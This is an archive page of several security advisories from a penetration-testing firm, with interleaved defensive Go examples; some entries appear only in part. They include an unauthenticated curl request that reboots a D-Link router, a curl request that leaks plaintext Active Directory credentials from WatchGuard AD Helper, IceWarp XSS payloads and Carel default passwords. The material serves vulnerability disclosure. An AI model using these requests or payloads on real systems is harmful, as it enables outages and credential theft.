[FD] [RT-SA-2020-005] Arbitrary File Disclosure and Server-Side Request Forgery in BigBlueButton

2020-10-21 Thread RedTeam Pentesting GmbH
exploit this vulnerability, attackers need to have access to a
conference with the ability to upload presentations. While successful
exploitation of this vulnerability would have severe consequences for
the affected BigBlueButton instance, it is only rated as a medium
risk because presenter access is required.


Timeline
========

2020-09-11 Vulnerability identified
2020-09-18 Customer approved disclosure to vendor
2020-09-22 CVE ID requested
2020-09-22 CVE ID assigned
2020-09-24 Requested encrypted communication with vendor
2020-09-25 Vendor unable to provide encrypted communication,
   Vendor notified
2020-09-25 Vendor confirmed being able to reproduce vulnerability,
   mentioned similar bugreport
2020-09-25 Requested information whether "similar bugreport"
   uses the same vulnerability - no answer
2020-10-13 Again requested information whether "similar bugreport"
   uses the same vulnerability, whether release schedule is
   known - no answer
2020-10-14 Vendor released fixed version (without mentioning vulnerability)
2020-10-21 Vulnerability published by third party [7]
2020-10-21 Advisory released


References
==========

[1] 
https://docs.bigbluebutton.org/support/faq.html#can-i-upload-microsoft-office-documents-to-bigbluebutton
[2] http://opendocumentformat.org/
[3] https://www.w3.org/TR/xlink11/
[4] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10583
[5] https://docs.bigbluebutton.org/dev/api.html#usage
[6] https://docs.bigbluebutton.org/support/faq.html#presentations
[7] 
https://www.golem.de/news/big-blue-button-das-grosse-blaue-sicherheitsrisiko-2010-151610.html


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH                 Tel.: +49 241 510081-0
Dennewartstr. 25-27                     Fax : +49 241 510081-99
52068 Aachen                            https://www.redteam-pentesting.de
Germany                                 Registergericht: Aachen HRB 14004
Geschäftsführer:                        Patrick Hof, Jens Liebchen


signature.asc
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2020-003] FRITZ!Box DNS Rebinding Protection Bypass

2020-10-19 Thread RedTeam Pentesting GmbH
7-08 Vendor notified
2020-07-20 Vendor provided fixed version to RedTeam Pentesting
2020-07-23 Vendor notified of another problematic IP
2020-08-06 Vendor provided fixed version to RedTeam Pentesting
2020-10-06 Vendor starts distribution of fixed version for selected devices 
2020-10-19 Advisory released



[FD] [RT-SA-2020-002] Denial of Service in D-Link DSR-250N

2020-10-08 Thread RedTeam Pentesting GmbH
Advisory: Denial of Service in D-Link DSR-250N

RedTeam Pentesting discovered a Denial-of-Service vulnerability in the
D-Link DSR-250N device which allows unauthenticated attackers in the
same local network to execute a CGI script which reboots the device.


Details
=======

Product: D-Link DSR-250N
Affected Versions: 3.12 and potentially later
Fixed Versions: 3.17B
Vulnerability Type: DoS
Security Risk: low
Vendor URL: 
https://www.dlink.com/en/products/dsr-250n-wireless-n-unified-service-router
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-002
Advisory Status: published
CVE: CVE-2020-26567
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26567


Introduction
============

"The D-Link Wireless N Unified Service Router (DSR-250N) provides
enhanced security, functionality and performance over a traditional VPN
router without the complexity of a full firewall solution. The D-Link
Wireless N Unified Service Router is a cost-effective, high performance
solution for securing a small business network."

(from the vendor's homepage)


More Details
============

During a penetration test, the firmware for the D-Link DSR-250N router
was downloaded from D-Link's official website [1] and extracted for
further analysis. It was then confirmed that CGI scripts exist on the
router that can be directly accessed with a web browser, without any
authentication. In particular, the script "upgradeStatusReboot.cgi"
executes the command to reboot the device. Its contents are:


#!/bin/sh
echo Content-type: text/plain
echo ""
stat=`/sbin/reboot -d 8 &`
echo $stat


Executing this script renders the device unusable for the duration of the
reboot. In tests, the device needed roughly four minutes to complete a
reboot. As a consequence, any network relying on the device as a switch or
router is unavailable during that time as well.

In the penetration test, the router's web interface was available
directly over the Internet. According to the vendor, the web interface
is by default disabled for the WAN interface.


Proof of Concept
================

An HTTP GET request to the CGI script "upgradeStatusReboot.cgi" will
reboot the device:


$ curl -k -s https://IP-ADDRESS/scgi-bin/upgradeStatusReboot.cgi



Workaround
==========

Access to the D-Link DSR-250N's web interface should only be enabled for
administrators, for example by only allowing access from specific IP
addresses in the firewall. Access over the WAN interface should also be
disabled if it was enabled manually.


Fix
===

A preview firmware version named 3.17B which should correct the issue
was received at the end of September from the vendor. RedTeam Pentesting
was not able to verify the fix due to lack of access to a test device.
However, the formerly accessible CGI script is no longer part of the
firmware.


Security Risk
=============

No authentication is needed to execute the CGI script and thereby reboot
the device. Attackers might abuse this behaviour for targeted
denial-of-service attacks against D-Link customers, since rebooting the
device interrupts access to networks relying on this device for routing
or switching purposes. However, the attack is only possible if the
attacker resides on the same network, and no further information can be
gathered or control over the devices be obtained. Therefore, the
vulnerability is rated as a low risk.


Timeline
========

2020-06-29 Vulnerability identified
2020-07-03 Customer approved disclosure to vendor
2020-07-03 Requested security contact from vendor via web form
2020-07-03 Vendor replied with contact information
2020-07-07 Advisory provided to vendor
2020-09-28 Vendor provided fixed version to RedTeam Pentesting
2020-10-05 CVE ID requested
2020-10-06 CVE ID assigned
2020-10-08 Advisory released


References
==========

[1] https://support.dlink.com/ProductInfo.aspx?m=DSR-250N



[FD] [RT-SA-2020-004] Inconsistent Behavior of Go's CGI and FastCGI Transport May Lead to Cross-Site Scripting

2020-09-02 Thread RedTeam Pentesting GmbH
8001
HTTP/1.1 200 OK
Content-Type: image/png
[...]

PNG[...]



Workaround
==========

Applications should explicitly set a Content-Type via the Header().Set()
method of the ResponseWriter interface. The relevant code from the
sample application mentioned above then looks like this:


handler := http.HandlerFunc(func(w http.ResponseWriter, req *http.Request) {
	// Set the Content-Type explicitly instead of relying on inference,
	// which the CGI/FastCGI writers did not perform.
	w.Header().Set("Content-Type", "image/png")
	w.Write(image)
})
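The workaround above relies on every handler remembering to set a Content-Type. As an added example (not code from the advisory or from the Go project), the middleware below enforces that centrally: if the wrapped handler set no Content-Type before its first write, the type is inferred with http.DetectContentType, and X-Content-Type-Options: nosniff is added so browsers do not re-sniff the body. The rawWriter type is a constructed stand-in for a ResponseWriter that passes headers through without inference, modelling the pre-fix CGI/FastCGI behaviour the advisory describes; EchoHandler is a hypothetical handler in the shape of the sample application.

```go
package main

import (
	"fmt"
	"net/http"
)

// EnsureContentType guarantees every response carries an explicit
// Content-Type before the first byte of the body is written. If the wrapped
// handler set none, the type is inferred from the first Write call (the same
// http.DetectContentType the net/http server uses), and nosniff is added.
func EnsureContentType(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		next.ServeHTTP(&typedWriter{ResponseWriter: w}, r)
	})
}

type typedWriter struct {
	http.ResponseWriter
	headerSent bool
}

// finalize fixes the headers exactly once; first is the initial body chunk
// (nil when WriteHeader is called before any Write).
func (w *typedWriter) finalize(first []byte) {
	if w.headerSent {
		return
	}
	w.headerSent = true
	h := w.Header()
	if h.Get("Content-Type") == "" {
		h.Set("Content-Type", http.DetectContentType(first))
	}
	h.Set("X-Content-Type-Options", "nosniff")
}

func (w *typedWriter) WriteHeader(code int) {
	w.finalize(nil)
	w.ResponseWriter.WriteHeader(code)
}

func (w *typedWriter) Write(b []byte) (int, error) {
	w.finalize(b)
	return w.ResponseWriter.Write(b)
}

// rawWriter models a ResponseWriter that, like the CGI/FastCGI writers before
// the fix, emits headers as given without inferring Content-Type
// (constructed for this example, not Go's own implementation).
type rawWriter struct {
	header http.Header
	status int
	body   []byte
}

func (r *rawWriter) Header() http.Header { return r.header }
func (r *rawWriter) WriteHeader(code int) {
	if r.status == 0 {
		r.status = code
	}
}
func (r *rawWriter) Write(b []byte) (int, error) {
	if r.status == 0 {
		r.status = http.StatusOK
	}
	r.body = append(r.body, b...)
	return len(b), nil
}

// EchoHandler serves stored, possibly user-supplied bytes. With explicit=false
// it relies on Content-Type inference, as the advisory's sample application
// did; with explicit=true it applies the workaround itself.
func EchoHandler(data []byte, explicit bool) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, req *http.Request) {
		if explicit {
			w.Header().Set("Content-Type", "image/png")
		}
		_, _ = w.Write(data)
	})
}

// ServeRaw runs h against the non-sniffing writer and returns the
// Content-Type and X-Content-Type-Options headers a client would receive.
func ServeRaw(h http.Handler) (contentType, nosniff string) {
	rw := &rawWriter{header: http.Header{}}
	req, _ := http.NewRequest(http.MethodGet, "/upload/1", nil)
	h.ServeHTTP(rw, req)
	return rw.header.Get("Content-Type"), rw.header.Get("X-Content-Type-Options")
}

func main() {
	// Constructed sample bodies: an HTML document and a PNG signature.
	html := []byte("<html><body>uploaded by a user</body></html>")
	png := []byte("\x89PNG\r\n\x1a\n")

	ct, _ := ServeRaw(EchoHandler(html, false))
	fmt.Printf("unwrapped, no explicit type: %q (browser will sniff)\n", ct)
	ct, ns := ServeRaw(EnsureContentType(EchoHandler(html, false)))
	fmt.Printf("wrapped, inferred type:      %q %s\n", ct, ns)
	ct, _ = ServeRaw(EnsureContentType(EchoHandler(png, true)))
	fmt.Printf("wrapped, explicit type kept: %q\n", ct)
}
```

Wrapping the whole mux (`EnsureContentType(mux)`) is enough to cover every handler; a handler that does set its own type is left untouched, so the middleware only fills the gap the CGI and FastCGI writers left.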



Fix
===

The CGI and FastCGI implementations of the ResponseWriter interface should
behave as documented and infer the Content-Type from the response data. This
was implemented in Go versions 1.14.8 and 1.15.1 (the patch can be found here
[7]).


Security Risk
=============

The risk of this vulnerability heavily depends on the concrete
application at hand. If it depends on the documented behavior and is
accessed via CGI or FastCGI and provides attackers a means to request
data they can influence, this may lead to a cross-site scripting
vulnerability.

When other users of the same application request the attackers' data,
the embedded JavaScript code is executed and the attackers can interact
with the web application in the user's name, display arbitrary content
within the user's browser, and observe the user's interaction with the
web application.

Considering the severe consequences and the requirements for
exploitation (serving via CGI/FastCGI instead of HTTP), this
vulnerability is rated as a medium risk.


Timeline
========

2020-08-07 Vulnerability identified
2020-08-10 Vendor notified
2020-08-10 Vendor acknowledges receipt of report
2020-08-14 Vendor confirms security issues
2020-08-20 Vendor announces plans for a minor release of Go
2020-09-01 Vendor releases new version of Go, issue[6] is #40928, patch[7]


References
==========

[1] https://pkg.go.dev/net/http/?tab=doc#ResponseWriter
[2] https://pkg.go.dev/net/http/httptest?tab=doc#ResponseRecorder
[3] https://mimesniff.spec.whatwg.org/
[4] 
https://github.com/golang/go/blob/ba9e10889976025ee1d027db6b1cad383ec56de8/src/net/http/cgi/child.go#L196-L199
[5] 
https://github.com/golang/go/blob/ba9e10889976025ee1d027db6b1cad383ec56de8/src/net/http/fcgi/child.go#L112-L114
[6] https://github.com/golang/go/issues/40928
[7] https://go-review.googlesource.com/c/go/+/252179/



[FD] [RT-SA-2020-001] Credential Disclosure in WatchGuard Fireware AD Helper Component

2020-03-13 Thread RedTeam Pentesting GmbH
Advisory: Credential Disclosure in WatchGuard Fireware AD Helper Component

RedTeam Pentesting discovered a credential-disclosure vulnerability in
the AD Helper component of the WatchGuard Fireware Threat Detection and
Response (TDR) service, which allows unauthenticated attackers to gain
Active Directory credentials for a Windows domain in plaintext.


Details
=======

Product: WatchGuard Fireware AD Helper Component
Affected Versions: 5.8.5.10233, < 5.8.5.10317
Fixed Versions: 5.8.5.10317
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: 
https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-001
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

"Threat Detection and Response (TDR) is a cloud-based subscription
service that integrates with your Firebox to minimize the consequences
of data breaches and penetrations through early detection and automated
remediation of security threats."

"Threat Detection and Response includes the AD Helper component. If your
network has an Active Directory server, you can install AD Helper to
manage automated installation and updates of Host Sensors on your
network."

(from the vendor's homepage)


More Details
============

By accessing the AD Helper's web interface, it was discovered that a
call to an API endpoint is made, which responds with plaintext
credentials to all configured domain controllers. There is no
authentication needed to use the described interface and the
installation instructions at [1] contain no indication of any way to
configure access control.


Proof of Concept
================

An HTTP GET request to the path "/domains/list" of the AD Helper
API returns, among others, the plaintext credentials to
all configured Windows domain controllers:


$ curl --silent \
    "http://adhelper.example.com:8080/rest/domains/list?sortCol=fullyQualifiedName=asc;" \
    | jq .

{
  "content": [
    {
      "id": 1,
      "fullyQualifiedName": "example.com",
      "logonDomain": "example.com",
      "domainControllers": "dc1.example.com",
      "username": "[DOMAIN_USER]",
      "password": "[DOMAIN_PASSWORD]",
      "uuid": "[...]",
      "servers": [
        {
          [...]
        }
      ]
    }
  ],
  "totalPages": 1,
  "totalElements": 1,
  "number": 0,
  "numberOfElements": 1
}


The same request and its response can be observed when initially accessing
the web interface. The discovered version of AD Helper responds with
the following server banner:


jetty(winstone-5.8.5.10233-9.4.12.v20180830)


It is likely that other versions of the AD Helper Component are
vulnerable as well.


Workaround
==========

Ensure that the API of the AD Helper Component is not reachable over the
network, for example by placing it behind a firewall.
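Both this workaround and the one for the D-Link DSR-250N above come down to the same control: the unauthenticated endpoint may only be reached from administrative addresses. As an added example (not code from either advisory or vendor), the Go program below checks that control after the fact, reading web-server access-log lines in the common combined format and raising an alert for every request to one of the two sensitive paths that did not originate from an allowlisted admin network. The log lines, the allowlist and the log format are constructed assumptions; the two paths are the ones named in the advisories.

```go
package main

import (
	"fmt"
	"net"
	"regexp"
	"strings"
)

// SensitivePaths are the unauthenticated endpoints from the advisories: the
// DSR-250N reboot CGI and the AD Helper domain list (query strings ignored).
var SensitivePaths = []string{
	"/scgi-bin/upgradeStatusReboot.cgi",
	"/rest/domains/list",
}

// combinedLog captures client address, method, path and status from a line
// in Apache/nginx combined log format (an assumption about the log source).
var combinedLog = regexp.MustCompile(`^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})`)

// Alert describes one request to a sensitive path from outside the admin networks.
type Alert struct {
	Client string
	Path   string
	Status string
}

func parseNets(cidrs []string) ([]*net.IPNet, error) {
	nets := make([]*net.IPNet, 0, len(cidrs))
	for _, c := range cidrs {
		_, n, err := net.ParseCIDR(c)
		if err != nil {
			return nil, fmt.Errorf("bad admin network %q: %w", c, err)
		}
		nets = append(nets, n)
	}
	return nets, nil
}

// AuditAccessLog returns an alert for every request to a sensitive path whose
// client address is not inside one of the admin networks. Lines that do not
// parse are skipped; a client address that does not parse is reported
// (fail closed).
func AuditAccessLog(lines []string, adminCIDRs []string) ([]Alert, error) {
	nets, err := parseNets(adminCIDRs)
	if err != nil {
		return nil, err
	}
	var alerts []Alert
	for _, line := range lines {
		m := combinedLog.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		client, path, status := m[1], m[3], m[4]
		if i := strings.IndexByte(path, '?'); i >= 0 {
			path = path[:i] // compare the path only, not its parameters
		}
		if !isSensitive(path) {
			continue
		}
		if ip := net.ParseIP(client); ip != nil && inAny(ip, nets) {
			continue // expected administrative access
		}
		alerts = append(alerts, Alert{Client: client, Path: path, Status: status})
	}
	return alerts, nil
}

func isSensitive(path string) bool {
	for _, p := range SensitivePaths {
		if path == p {
			return true
		}
	}
	return false
}

func inAny(ip net.IP, nets []*net.IPNet) bool {
	for _, n := range nets {
		if n.Contains(ip) {
			return true
		}
	}
	return false
}

// SampleLog holds constructed log lines: two requests from outside the admin
// network hit sensitive endpoints, the other two are expected traffic.
var SampleLog = []string{
	`203.0.113.7 - - [08/Oct/2020:10:15:02 +0200] "GET /scgi-bin/upgradeStatusReboot.cgi HTTP/1.1" 200 17 "-" "curl/7.68.0"`,
	`192.168.1.10 - - [08/Oct/2020:10:16:40 +0200] "GET /scgi-bin/upgradeStatusReboot.cgi HTTP/1.1" 200 17 "-" "Mozilla/5.0"`,
	`198.51.100.22 - - [08/Oct/2020:10:17:05 +0200] "GET /rest/domains/list?sortCol=fullyQualifiedName HTTP/1.1" 200 512 "-" "curl/7.68.0"`,
	`192.168.1.10 - - [08/Oct/2020:10:18:00 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"`,
}

// AdminNetworks is the constructed allowlist of administrative addresses.
var AdminNetworks = []string{"192.168.1.0/24"}

func main() {
	alerts, err := AuditAccessLog(SampleLog, AdminNetworks)
	if err != nil {
		panic(err)
	}
	for _, a := range alerts {
		fmt.Printf("ALERT %s requested %s (status %s)\n", a.Client, a.Path, a.Status)
	}
}
```

Because the DSR-250N script reboots the device, a 200 for the reboot CGI from an unexpected address is a strong signal on its own; for the AD Helper endpoint the same alert means domain credentials were handed out, so it should trigger a credential rotation, not just an investigation.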


Fix
===

Update to Version 5.8.5.10317 or later.


Security Risk
=============

No authentication is needed to access AD Helper's web interface and the
installation instructions at [1] describe that configured domain user
accounts must possess at least the following privileges:

 * Connect to the host
 * Mount the share ADMIN$
 * Create a file on the host
 * Execute commands on the host
 * Install software on the host

Access to the "ADMIN$" share implies a user with administrative
privileges. Therefore, this vulnerability poses a high risk.


Timeline
========

2020-02-12 Vulnerability identified
2020-02-19 Customer approved disclosure to vendor
2020-02-24 Tried to contact the German branch of WatchGuard
2020-02-27 Contacted the Dutch branch of WatchGuard
2020-02-28 Contact to ADHelper QA Team Lead established
2020-03-02 Advisory draft sent for verification
2020-03-10 Vendor released fixed version and blog post
2020-03-11 CVE ID requested
2020-03-11 Advisory released


References
==========

[1] 
https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html



[FD] [RT-SA-2019-016] IceWarp: Cross-Site Scripting in Notes

2020-01-02 Thread RedTeam Pentesting GmbH
Advisory: IceWarp: Cross-Site Scripting in Notes

During a penetration test, RedTeam Pentesting discovered that the
IceWarp WebMail Server is prone to cross-site scripting attacks in notes
for objects. If attackers with access to the IceWarp system provide a
manipulated object that is displayed by users, they can run arbitrary
JavaScript code in the users' browsers.

Details
=======

Product: IceWarp WebMail Server
Affected Versions: IceWarp 12.2.0, 12.1.x, probably earlier as well
Fixed Versions: IceWarp 12.2.1.1
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: http://www.icewarp.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-016
Advisory Status: published
CVE: CVE-2019-19266
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19266

Introduction
============

"Secure professional email with own domain and revolutionary integration
with chat. Shared calendars for perfect planning."
(from the vendor's homepage)


More Details
============

Users can create, modify and share appointments in IceWarp with other
users of the web application. Especially noteworthy are the following
two XML Entities in the request to create a new appointment:


text/html
<h1>RedTeam Pentesting</h1>


These define a note for an appointment. It was found that in notes some
HTML entities were rendered, but some entities and attributes were
filtered. However, the filter only takes effect when the content type of
the note is set to "text/html". When the content type is left out or set
to any other type, the filter is not active, enabling attackers to
circumvent the filter and execute JavaScript in the user's browser. The
same is true for notes attached to other objects, such as files or
tasks.

Just using the calendar module, at least three ways to attack other
IceWarp users are available using cross-site scripting in a note of an
appointment:

 * Inviting other attendees to an appointment
 * Sharing access to an appointment
 * Sending a calendar file as a request via email

Especially for the first variant of attacking an IceWarp user by adding
that user to a manipulated appointment, no user interaction is required
from the attacked user besides opening the IceWarp calendar.

Proof of Concept
================

Create an appointment using an HTTP request similar to the following:


POST /[...]/webmail/server/webmail.php HTTP/1.1
Host: icewarp.example.com
Content-Type: text/xml


  

  

  
Example Appointment
0


U

<img style="display: none;" src="x" onerror="alert('RedTeam Pentesting')">
0
Z
<_tzevnstartdate>2458801
<_tzevnenddate>2458801
<_tzevnstarttime>660
<_tzevnendtime>690
<_tzid>Europe/Amsterdam
60
  

  

  




Workaround
==========

None known.


Fix
===

Update to IceWarp 12.2.1.1.


Security Risk
=============

Attackers with access to an IceWarp account could give other legitimate
IceWarp users access to manipulated objects. If the attacked user opens
the preview of such an object, for example by just opening the calendar,
a cross-site scripting vulnerability can be exploited. That could, for
example, be used to display a fake login form and get access to the
user's credentials, or to access any data stored in IceWarp such as
emails, contacts, tasks, files or appointments. While this requires an
attacker with access to an IceWarp account, this kind of access could be
gained by exploiting the vulnerability described in rt-sa-2019-15 [1].
This is considered to pose a high risk.


Timeline
========

2019-11-11 Vulnerability identified
2019-11-15 Vendor notified
2019-11-22 Customer approved disclosure
2019-11-25 CVE number requested
2019-11-25 CVE number assigned
2019-12-02 Vendor released fixed version
2019-12-10 Customer approved disclosure
2019-12-13 Fixed version released
2020-01-02 Advisory released


References
==========

[1] https://www.redteam-pentesting.de/advisories/rt-sa-2019-015



[FD] [RT-SA-2019-015] IceWarp: Cross-Site Scripting in Notes for Contacts

2020-01-02 Thread RedTeam Pentesting GmbH
Advisory: IceWarp: Cross-Site Scripting in Notes for Contacts

During a penetration test, RedTeam Pentesting discovered that the
IceWarp WebMail Server is prone to user-assisted cross-site scripting
attacks in its contact module. If IceWarp users import a manipulated
vcard, for example from an email, attackers can run arbitrary JavaScript
code in the users' browsers.


Details
=======

Product: IceWarp WebMail Server
Affected Versions: IceWarp 12.2.0, 12.1.x, probably earlier as well
Fixed Versions: IceWarp 12.2.1.1
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: http://www.icewarp.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-15
Advisory Status: published
CVE: CVE-2019-19265
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19265

Introduction
============

"Secure professional email with own domain and revolutionary integration
with chat. Shared calendars for perfect planning."
(from the vendor's homepage)


More Details
============

IceWarp allows users to import contacts in vcard format [1] from emails.
These contacts can contain HTML notes as can be seen by exporting notes
created by IceWarp. The following line shows such a note:


X-ALT-NOTE;FMTTYPE=text/html:RedTeam Pentesting


By inserting JavaScript here, a cross-site scripting vulnerability can
be exploited if an IceWarp user imports such a manipulated contact into
IceWarp. The property handling for the HTML formatted note "X-ALT-NOTE"
and "FMTTYPE" is not defined in the vcard [1] standard, but is borrowed
from the calendar file format ical [2]. Originally, the vcard standard
uses the property "NOTE". This field can be used to exploit a cross-site
scripting in IceWarp, too.
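The two IceWarp advisories describe one root cause from two angles: RT-SA-2019-016 shows that the note filter only runs when the declared content type is exactly "text/html", and this advisory shows that the same notes arrive through imported vcards as X-ALT-NOTE (with FMTTYPE) or plain NOTE properties. As an added example (not IceWarp's code, whose filter is not public), the Go program below models that bug beside a hardened variant: NoteFilterVulnerable trusts the declared type, NoteFilterFixed filters HTML notes and escapes everything else, and RenderVCardNotes feeds both note properties from a vcard into whichever filter is chosen. The allowlist filter, the tag list and the sample vcard are constructed assumptions.

```go
package main

import (
	"fmt"
	"html"
	"strings"
)

// allowedTags are the only tags a note may keep; all other tags and every
// attribute are dropped by stripDangerous.
var allowedTags = map[string]bool{"b": true, "i": true, "u": true, "p": true, "br": true, "h1": true}

// stripDangerous is a small allowlist filter: text is HTML-escaped, allowed
// tags are re-emitted without attributes, all other tags are removed.
func stripDangerous(s string) string {
	var out strings.Builder
	for {
		lt := strings.IndexByte(s, '<')
		if lt < 0 {
			out.WriteString(html.EscapeString(s))
			return out.String()
		}
		out.WriteString(html.EscapeString(s[:lt]))
		gt := strings.IndexByte(s[lt:], '>')
		if gt < 0 {
			out.WriteString(html.EscapeString(s[lt:]))
			return out.String()
		}
		tag := s[lt+1 : lt+gt]
		closing := strings.HasPrefix(tag, "/")
		fields := strings.Fields(strings.TrimPrefix(tag, "/"))
		if len(fields) > 0 && allowedTags[strings.ToLower(fields[0])] {
			name := strings.ToLower(fields[0])
			if closing {
				out.WriteString("</" + name + ">")
			} else {
				out.WriteString("<" + name + ">")
			}
		}
		s = s[lt+gt+1:]
	}
}

// NoteFilterVulnerable mirrors the behaviour described in RT-SA-2019-016:
// the filter runs only when the declared content type is exactly
// "text/html"; any other or missing type is rendered unfiltered.
func NoteFilterVulnerable(contentType, note string) string {
	if contentType == "text/html" {
		return stripDangerous(note)
	}
	return note
}

// NoteFilterFixed decides by what will be rendered, not by what the client
// declared: HTML notes are filtered, everything else is escaped as text.
func NoteFilterFixed(contentType, note string) string {
	if strings.EqualFold(strings.TrimSpace(contentType), "text/html") {
		return stripDangerous(note)
	}
	return html.EscapeString(note)
}

// RenderVCardNotes extracts NOTE and X-ALT-NOTE properties from a vcard and
// passes each through filter with its FMTTYPE parameter (empty for a plain
// NOTE). Folded lines (RFC 6350 section 3.2, space continuation) are unfolded.
func RenderVCardNotes(vcard string, filter func(contentType, note string) string) []string {
	unfolded := strings.ReplaceAll(strings.ReplaceAll(vcard, "\r\n", "\n"), "\n ", "")
	var notes []string
	for _, line := range strings.Split(unfolded, "\n") {
		head, value, ok := strings.Cut(line, ":")
		if !ok {
			continue
		}
		parts := strings.Split(head, ";")
		name := strings.ToUpper(parts[0])
		if name != "NOTE" && name != "X-ALT-NOTE" {
			continue
		}
		contentType := ""
		for _, p := range parts[1:] {
			if k, v, ok := strings.Cut(p, "="); ok && strings.EqualFold(k, "FMTTYPE") {
				contentType = v
			}
		}
		notes = append(notes, filter(contentType, value))
	}
	return notes
}

// SampleVCard is a constructed vcard in the shape of the proof of concept:
// an HTML note and a plain NOTE that both carry markup.
const SampleVCard = "BEGIN:VCARD\r\nVERSION:4.0\r\nFN:Pentesting\\, RedTeam\r\n" +
	"X-ALT-NOTE;FMTTYPE=text/html:<b>Hello</b><img src=x onerror=alert(1)>\r\n" +
	"NOTE:<img src=x onerror=alert(1)>\r\n" +
	"EMAIL;TYPE=INTERNET,PREF:testuser@example.com\r\nEND:VCARD\r\n"

func main() {
	for _, n := range RenderVCardNotes(SampleVCard, NoteFilterVulnerable) {
		fmt.Println("vulnerable:", n)
	}
	for _, n := range RenderVCardNotes(SampleVCard, NoteFilterFixed) {
		fmt.Println("fixed:     ", n)
	}
}
```

The HTML note is filtered by both variants, but the plain NOTE passes through the vulnerable filter untouched because its content type is empty; the fixed variant never renders unfiltered markup regardless of what the vcard declares.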


Proof of Concept
================

Send an IceWarp user one of the following vcards:


BEGIN:VCARD
VERSION:4.0
FN:Pentesting\, RedTeam
N:Pentesting;RedTeam;;;
X-ALT-NOTE;FMTTYPE=text/html:
EMAIL;TYPE=INTERNET,PREF:testus...@example.com
END:VCARD


or


BEGIN:VCARD
VERSION:4.0
FN:Pentesting\, RedTeam
N:Pentesting;RedTeam;;;
NOTE:
EMAIL;TYPE=INTERNET,PREF:testus...@example.com
END:VCARD



Workaround
==========

None known.


Fix
===

Update to IceWarp 12.2.1.1.


Security Risk
=============

Attackers without an account on the IceWarp system can send specially
crafted vcard [1] files to IceWarp users. If an IceWarp user imports
that new contact into the IceWarp web application, a cross-site scripting
vulnerability can be exploited. That could, for example, be used to
display a fake login form and get access to the user's credentials, or
to access any data stored in IceWarp such as emails, contacts, tasks,
files or appointments. Access to these could be abused to exploit the
vulnerability described in rt-sa-2019-016 [3].
This is considered to pose a high risk.


Timeline
========

2019-11-11 Vulnerability identified
2019-11-15 Vendor notified
2019-11-22 Customer approved disclosure
2019-11-25 CVE number requested
2019-11-25 CVE number assigned
2019-12-02 Vendor released fixed version
2019-12-10 Customer approved disclosure
2019-12-13 Fixed version released
2020-01-02 Advisory released


References
==========

[1] https://tools.ietf.org/html/rfc6350
[2] https://tools.ietf.org/html/rfc2445
[3] https://www.redteam-pentesting.de/advisories/rt-sa-2019-16




[FD] [RT-SA-2019-014] Unauthenticated Access to Modbus Interface in Carel pCOWeb HVAC

2019-10-31 Thread RedTeam Pentesting GmbH
 notified
2019-09-09 Vendor did not respond as promised
2019-09-17 Vendor could not be reached
2019-09-18 Vendor could not be reached
2019-10-28 Advisory published due to publication of CVE-2019-13549


References
==========

[0] https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-013.txt
[1] http://modbus.org/docs/MB-TCP-Security-v21_2018-07-24.pdf
[2] https://www.metasploit.com/
[3] https://www.rapid7.com/db/modules/auxiliary/scanner/scada/modbusclient
[4] 
https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0



[FD] [RT-SA-2019-013] Unsafe Storage of Credentials in Carel pCOWeb HVAC

2019-10-31 Thread RedTeam Pentesting GmbH
lash/etc/sysconfig/userspwd
PROOT=froot
PHTTP=fhttpadmin
PGUEST=fguest
PCAREL=fcarel



Workaround
==========

Change all default passwords listed above and ensure the user "nobody"
is disabled or has a password set.
The Carel pCOWeb card should not be connected to networks accessible by
untrusted users (compare advisory rt-sa-2019-014[1]).
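Since no firmware fix will be published, the workaround has to be verified by hand on each card. As an added example (not code from the advisory or from Carel), the Go program below audits the two files the advisory names: a passwd-style file, where an empty password field marks an enabled account usable without a password, and a userspwd-style KEY=value file, where a value equal to the factory default listed above (or empty) is flagged. The sample file contents are constructed, and the hash strings in them are placeholders.

```go
package main

import (
	"fmt"
	"strings"
)

// DefaultPasswords are the factory values from the userspwd listing in the
// advisory, keyed by the variable that stores them.
var DefaultPasswords = map[string]string{
	"PROOT":  "froot",
	"PHTTP":  "fhttpadmin",
	"PGUEST": "fguest",
	"PCAREL": "fcarel",
}

// Finding names an account or variable and what is wrong with it.
type Finding struct {
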